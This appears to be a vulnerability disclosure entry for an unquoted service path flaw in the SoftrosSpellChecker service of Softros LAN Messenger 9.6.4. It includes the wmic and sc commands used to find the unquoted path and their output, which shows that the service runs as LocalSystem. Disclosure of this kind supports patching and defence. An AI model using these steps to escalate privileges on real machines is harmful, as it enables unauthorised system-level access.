Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path

2021-02-24
ID: 104068
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Discovery by: Victor Mondragón
# Discovery Date: 23-02-2021
# Vendor Homepage: https://www.softros.com/
# Software Links : https://download.softros.com/SoftrosLANMessengerSetup.exe
# Tested Version: 9.6.4
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Pro 64 bits

# Step to discover Unquoted Service Path: 
 

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
Softros Spell Checker           SoftrosSpellChecker     C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe      Auto

C:\>sc qc SoftrosSpellChecker
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SoftrosSpellChecker
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe
        GRUPO_ORDEN_CARGA  : System Reserved
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Softros Spell Checker
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
1-4-2 (www02)